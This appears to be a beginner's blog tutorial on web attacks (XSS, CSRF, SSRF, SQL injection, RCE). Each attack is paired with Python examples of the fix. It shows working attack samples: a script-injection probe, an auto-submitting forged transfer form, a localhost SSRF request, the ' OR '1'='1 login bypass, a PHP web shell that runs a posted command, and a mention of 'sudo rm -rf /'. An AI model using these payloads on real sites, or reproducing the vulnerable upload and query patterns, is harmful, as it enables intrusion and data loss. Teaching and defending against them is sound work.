Web Application Attacks: the basics to get started, in brief

Hmm… So you want to learn web application hacking? Okay, let me help you. We'll begin with some of the basic attacks, in brief…

XSS

So XSS is one of the major client-side attacks. It stands for Cross-Site Scripting. In this attack, the attacker gets a piece of malicious code executed in the client's browser via a trusted site. Okay, let me help you with an example: you go to a trusted social media platform and scroll through the posts. One of those posts was written by the attacker and contains script; the server stored it and serves it to you without neutralising it, your browser renders it as part of the trusted page, and the script runs with access to your session on that site. Now you are hacked…

How to perform XSS

Ha! XSS is nothing more than getting your own JavaScript to run on someone else's origin. Assume that a post appears like this in the page's HTML on a social media platform:

<div id="post">This is your post</div>

So the thing we have to do here is break out of the plain text and execute an alert. If the server drops the post into the HTML unescaped, this can be done by creating the post <script>alert("XSS")</script>. Let's do it, and the HTML we get is…

<div id="post"><script>alert("XSS")</script></div>

The alert itself is harmless, but it is the standard way to confirm that injected script actually runs; a real payload would do the same thing with code that steals the session cookie or acts as the victim. The root cause is the missing output encoding: if the server had written &lt;script&gt; instead of <script>, the browser would have shown the text instead of executing it.
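The rendering bug and its fix, as an added Python example (not code from the original post, which shows only the resulting HTML). The post strings are constructed here for the demo; the unsafe renderer concatenates user text into HTML exactly as the vulnerable site above does, and the safe one HTML-escapes it first. The "live script" check is a crude regex used only to make the difference visible, not a real XSS detector.

```python
import html
import re

# Constructed sample posts: the probe used above and an attribute-context variant.
PAYLOAD_SCRIPT = '<script>alert("XSS")</script>'
PAYLOAD_ATTR = '"><img src=x onerror=alert(1)>'


def render_post_unsafe(post: str) -> str:
    """The vulnerable pattern: user-controlled text dropped straight into HTML."""
    return f'<div id="post">{post}</div>'


def render_post_safe(post: str) -> str:
    """The fix: escape <, >, &, and quotes so the browser displays the text
    instead of parsing it as markup."""
    return f'<div id="post">{html.escape(post, quote=True)}</div>'


# Matches a real <script> tag or an inline event-handler attribute inside a tag.
# Deliberately crude: it only serves to show which output still contains live markup.
LIVE_MARKUP = re.compile(r"<script\b|<\w+[^>]*\son\w+\s*=", re.IGNORECASE)


def contains_live_markup(rendered: str) -> bool:
    return LIVE_MARKUP.search(rendered) is not None


if __name__ == "__main__":
    for payload in (PAYLOAD_SCRIPT, PAYLOAD_ATTR):
        print("unsafe:", render_post_unsafe(payload), contains_live_markup(render_post_unsafe(payload)))
        print("safe:  ", render_post_safe(payload), contains_live_markup(render_post_safe(payload)))
```

The escaped form still shows the attacker's text to other users, which is the correct behaviour: a post that literally reads "<script>alert("XSS")</script>" is just an odd post. Escaping has to match the context (HTML body here; attribute values, JavaScript strings and URLs each need their own encoding), which is why frameworks do it in the template engine rather than by hand.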

CSRF

Okay, so CSRF stands for Cross-Site Request Forgery. This is also a type of client-side attack, in which the attacker makes the victim's browser perform a sensitive action on a site where the victim is logged in, using a page the attacker controls. Let's understand it with a diagram (the drawing itself is not reproduced here):

Okay, so in my bad drawing above you can see a malicious page, which looks something like this:

<form hidden id="form" method="POST" action="http://vulnerable.site/dash/transaction">
<input name="from" type="number" value="1234567890">
<input name="to" type="number" value="0987654321">
<input name="amount" value="9999999">
</form>
<script>
// A <form> element has no load event, so an onload="submit()" attribute on the
// form would never fire. Submitting from a script placed after the form works.
document.getElementById("form").submit();
</script>

Okay, so what this page does is auto-submit the hidden form as soon as the victim loads it. The browser attaches the victim's cookies for vulnerable.site to the request, and those cookies are what keep a person logged in to a web service. When the server accepts the request it thinks the request was made by the account owner, i.e. the victim, and performs the transaction. This works only when two things are true: the browser sends the session cookie on a cross-site POST (cookies without a SameSite attribute, or with SameSite=None, are sent; SameSite=Lax or Strict cookies are not), and the server has no way to tell a forged form from its own, which is what an anti-CSRF token provides.
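The server-side defence that the forged form cannot satisfy, as an added Python example (not code from the original post). It models the transaction endpoint twice: the vulnerable version trusts the cookie alone, the fixed version also requires a token bound to the session with an HMAC. The server secret, session id and form contents are constructed for the demo; the attacker's page from above can post the form fields, but it cannot read the token out of a page rendered for the victim, so its request fails.

```python
import hashlib
import hmac

# Assumption: a per-deployment secret known only to the server.
SERVER_SECRET = b"constructed-server-secret-do-not-reuse"

# Constructed victim session and the attacker's form from the page above.
VICTIM_COOKIES = {"session": "victim-session-abc"}
FORGED_FORM = {"from": "1234567890", "to": "0987654321", "amount": "9999999"}


def csrf_token_for(session_id: str) -> str:
    """Token derived from the session. It is embedded in the site's own forms
    (hidden input or response header); a third-party page never sees it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def handle_transaction_vulnerable(cookies: dict, form: dict) -> str:
    """Before: being logged in is the only check, so a forged cross-site POST succeeds."""
    if "session" not in cookies:
        return "401 not logged in"
    return f"200 moved {form['amount']} from {form['from']} to {form['to']}"


def handle_transaction(cookies: dict, form: dict) -> str:
    """After: the form must carry the token for this session, compared in constant time."""
    session_id = cookies.get("session")
    if session_id is None:
        return "401 not logged in"
    expected = csrf_token_for(session_id)
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(expected, supplied):
        return "403 missing or invalid CSRF token"
    return f"200 moved {form['amount']} from {form['from']} to {form['to']}"


def legitimate_form() -> dict:
    """What the site's own transfer page submits: the same fields plus the token."""
    return {**FORGED_FORM, "csrf_token": csrf_token_for(VICTIM_COOKIES["session"])}


if __name__ == "__main__":
    print("vulnerable, forged:", handle_transaction_vulnerable(VICTIM_COOKIES, FORGED_FORM))
    print("fixed, forged:     ", handle_transaction(VICTIM_COOKIES, FORGED_FORM))
    print("fixed, legitimate: ", handle_transaction(VICTIM_COOKIES, legitimate_form()))
```

Setting SameSite=Lax on the session cookie stops this particular attack as well, since the browser then withholds the cookie on a cross-site POST, but the token check is the defence that does not depend on browser behaviour, so production code uses both.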

SSRF

Okay, so SSRF stands for Server-Side Request Forgery and is a type of server-side attack. In this attack, the attacker makes the server send requests on the attacker's behalf, to internal services that are normally unreachable from the outside and also to external ones, using the server's own network position and credentials. So why is being able to reach an internal or external service sensitive? Internal services usually trust anything that comes from inside the network or from localhost, so a request the server is tricked into making carries that trust. Let's understand this with the help of an example:

The company runs an internal HTTP service on port 5555 that its developers use to manage the website; it is bound to localhost and is not supposed to be reachable from the Internet. So, you as a hacker see the following request going to the server:

POST /api/update_my_blog HTTP/1.1
Host: vuln.host
Accept: */*
Accept-Language: en-us
User-Agent: MyBrowser/1.0
Content-Type: application/x-www-form-urlencoded

blog=blog_name&password=letmein&change=http://localhost:60000/update/blog/

So, here you can see that the change parameter holds a URL, and that URL already points at localhost, an address only the server itself can reach. In other words, the server takes this value and fetches it from its own network position. Now you as a hacker know that the server also has the developers' management service on port 5555. You change the "change" parameter to http://localhost:5555/ and the server obediently talks to an internal service that was never meant to be exposed. What you can do from there depends on what that service offers, but you have crossed the boundary that the firewall was supposed to enforce. The fix is never to fetch a user-supplied URL as-is: validate the scheme and host against an allowlist of the targets the feature actually needs.
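A validator for the "change" parameter, as an added Python example (not code from the original post, whose server-side code is not shown). It checks the URL before the server fetches it: only http/https, only a single allowlisted host, and no loopback, private, link-local or unspecified IP literals. The allowlisted hostname and the sample URLs are constructed for the demo; 169.254.169.254 is the cloud metadata address that SSRF attackers typically aim for.

```python
import ipaddress
from urllib.parse import urlsplit

# Assumption: the only host the blog-update feature legitimately needs to reach.
ALLOWED_HOSTS = {"blog-updater.example.com"}


def is_internal_target(url: str) -> bool:
    """True if the URL points somewhere a client must never make the server fetch."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return True                      # file://, gopher://, etc. are out
    host = parts.hostname                # lower-cased, userinfo and port stripped
    if host is None:
        return True
    if host == "localhost" or host.endswith(".localhost"):
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # A DNS name. Whether it resolves to an internal address can only be
        # decided at connect time (and may change: DNS rebinding), which is why
        # validate_change_url() below also requires an allowlisted name.
        return False
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def validate_change_url(url: str) -> bool:
    """Accept only http(s) URLs whose host is on the allowlist and not internal."""
    parts = urlsplit(url)
    return (parts.scheme in ("http", "https")
            and parts.hostname in ALLOWED_HOSTS
            and not is_internal_target(url))


if __name__ == "__main__":
    for candidate in (
        "https://blog-updater.example.com/update/blog/",
        "http://localhost:5555/",
        "http://127.0.0.1:5555/",
        "http://[::1]:5555/",
        "http://169.254.169.254/latest/meta-data/",
        "http://blog-updater.example.com@localhost:5555/",
        "file:///etc/passwd",
    ):
        print(f"{candidate!r:55} allowed={validate_change_url(candidate)}")
```

The userinfo trick (allowed-host@localhost) is included because naive checks that look for the allowlisted string anywhere in the URL pass it; urlsplit().hostname correctly yields localhost. Two things this validator cannot do by itself: stop a hostname that resolves to an internal address, and stop redirects from an allowed host to an internal one. Both need the HTTP client to re-check the resolved address and to refuse or re-validate redirects.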

SQLi

SQLi stands for SQL Injection. SQL is the language used to query relational databases. In this type of attack the attacker injects SQL of their own into a query that the application builds by pasting user input into a string (in a SQL database, SQL commands are used to manage the data, so controlling the command means controlling the data). Let's see an example: as the input, submit a single quote (').

Here the payload is just a single quote. If the application concatenates the input into the query, the quote closes the string literal early and the database returns a syntax error. The error alone does not hack the server, but it tells you the input reaches the query unescaped; from there, input such as ' OR '1'='1 changes what the query returns, and further crafted input reads other tables. It is very critical because the SQL database usually stores the credentials and everything else the application holds, and if that is accessed without authorisation, you know the rest. The fix is to never build queries from strings: use parameterised queries, so the input is always treated as data.
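The vulnerable query beside its parameterised form, as an added Python example (not code from the original post) using SQLite in memory so it runs offline. The table, the user and the inputs are constructed for the demo: the single-quote probe makes the string-built query fail, the ' OR '1'='1 payload logs in without the password, and the parameterised version treats the same payload as an ordinary (wrong) password.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one user with a password the attacker does not know."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse battery staple')")
    conn.commit()
    return conn


DB = make_db()


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Before: input is pasted into the SQL text, so quotes in it become SQL."""
    query = (f"SELECT username FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """After: placeholders; the driver sends the values separately from the SQL."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def probe_with_quote(conn: sqlite3.Connection) -> str:
    """The single-quote probe from above: returns the database error text, or '' if none."""
    try:
        login_vulnerable(conn, "'", "anything")
    except sqlite3.OperationalError as exc:
        return str(exc)
    return ""


if __name__ == "__main__":
    print("probe error:", probe_with_quote(DB))
    print("vulnerable, ' OR '1'='1 :", login_vulnerable(DB, "alice", "' OR '1'='1"))
    print("safe,       ' OR '1'='1 :", login_safe(DB, "alice", "' OR '1'='1"))
```

The bypass works because the built query becomes WHERE username = 'alice' AND password = '' OR '1'='1', and OR binds more loosely than AND, so the row matches regardless of the password. With placeholders the same characters are just a string compared against the column, which is why parameterisation, not quote-stripping, is the fix.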

RCE

So RCE stands for Remote Code Execution. It is also very critical, as it allows the attacker to execute code of their choosing on the server. If you talk about the POWER OF CODE, anything is possible with code: you can obtain a reverse shell or execute any command, including sudo rm -rf / (Warning! the command "sudo rm -rf /" is extremely dangerous, as it deletes the whole system. I won't be responsible if you run this command. Do it at your own risk.)

Okay, so let’s see an example:-

Server code to create a new file (file saving server):

<?php
// Vulnerable "file saving" endpoint: the client-supplied filename is forwarded
// untouched, so a name like payload.php ends up in a web-served directory.
$filename = $_POST["filename"];
$content = $_POST["content"];
$fn_b64 = base64_encode($filename);
$cn_b64 = base64_encode($content);
$cn_url = urlencode($cn_b64);
$fn_url = urlencode($fn_b64);
$save_file = file_get_contents("http://localhost:5432/?filename=$fn_url&content=$cn_url");
?>

Okay, so let me explain the above code in brief. First of all, the filename and the content are base64 encoded and then URL encoded and sent to an internal file-managing service on port 5432 (SSRF is not possible here, because the target URL is fixed and the user input only ends up in the encoded query values). The internal service then saves the content to "/uploads/user/filename.ext". The bug is that nothing checks the filename: whatever extension the user chooses is what lands in the uploads directory, and that directory is served by the same web server that executes PHP.

So now we upload a file named payload.php to the server. The payload code is:

<?php
// Web shell: runs whatever arrives in the POST parameter "cmd" and echoes the output.
$cmd = $_POST["cmd"];
echo shell_exec($cmd);
?>

Okay, so this code executes the cmd parameter of a POST request and returns the output of the command. Requesting /uploads/user/payload.php with cmd=id runs id as the web server's user, and now we can play around with the command line!
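The missing filename check, as an added Python example (not code from the original post, whose server is PHP). It shows the validation the file-saving endpoint should have done before forwarding the name: reject path components, double extensions and anything not on a short allowlist, and store the file under a random name so the client never chooses what ends up on disk. The allowed extensions and the sample filenames are constructed for the demo.

```python
import os
import re
import secrets

# Assumption: the kinds of file this upload feature is actually for.
ALLOWED_EXTENSIONS = {"txt", "png", "jpg", "pdf"}
STEM_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def validate_upload_name(filename: str) -> tuple[bool, str]:
    """Return (ok, reason). Everything not explicitly allowed is rejected."""
    # Any directory separator means the name is trying to escape /uploads/user/.
    base = os.path.basename(filename.replace("\\", "/"))
    if base != filename or not base:
        return False, "path components not allowed"
    # Exactly one extension: blocks shell.php.txt tricks and dotfiles like .htaccess.
    if base.count(".") != 1:
        return False, "exactly one extension required"
    stem, ext = base.rsplit(".", 1)
    if not STEM_RE.match(stem):
        return False, "bad characters in name"
    if ext.lower() not in ALLOWED_EXTENSIONS:
        return False, f"extension .{ext} not allowed"
    return True, ""


def stored_name(filename: str) -> str:
    """Name to use on disk: a random token plus the vetted, lower-cased extension."""
    ok, reason = validate_upload_name(filename)
    if not ok:
        raise ValueError(reason)
    ext = filename.rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    for name in ("notes.txt", "payload.php", "shell.PHP", "shell.php.txt",
                 "../../var/www/html/shell.php", ".htaccess", "photo.png"):
        print(f"{name!r:35} -> {validate_upload_name(name)}")
    print("stored as:", stored_name("photo.png"))
```

Validation alone is defence in depth, not the whole fix: the uploads directory should also be served with script execution disabled (or from a separate host), so that even a file that slips through is returned as bytes rather than run.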

So now, I hope this post helps you get started with "Web Application Hacking".

Thanks for Reading

School Student and CyberSec Enthusiast